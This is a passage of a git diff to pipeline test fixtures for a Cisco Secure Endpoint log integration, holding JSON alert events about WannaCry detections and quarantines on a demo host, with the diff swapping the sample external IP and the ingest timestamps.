Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214492323807000,"timestamp":1610631810,"timestamp_nanoseconds":447000000,"date":"2021-01-14T13:43:30+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214488028840000,"timestamp":1610631809,"timestamp_nanoseconds":916000000,"date":"2021-01-14T13:43:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945890085425,"timestamp":1610630976,"timestamp_nanoseconds":535214029,"date":"2021-01-14T13:29:36+00:00","event_type":"Potential Dropper Infection","event_type_id":1107296257,"detection":"W32.Variant:Gen.20gl.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610630976,"start_date":"2021-01-14T13:29:36+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412574627503014000,"timestamp":1610630889,"timestamp_nanoseconds":341000000,"date":"2021-01-14T13:28:09+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":50000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":596000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":34000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":941000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":894000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":4688,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":286000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} \ No newline at end of file diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json index 532974c5229..84d6a848011 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json @@ -18,7 +18,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -28,8 +28,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103711441Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847664\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461437500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847664\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -49,7 +49,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -94,7 +94,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -104,8 +104,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103716854Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847663\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461446400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847663\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -125,7 +125,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -170,7 +170,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 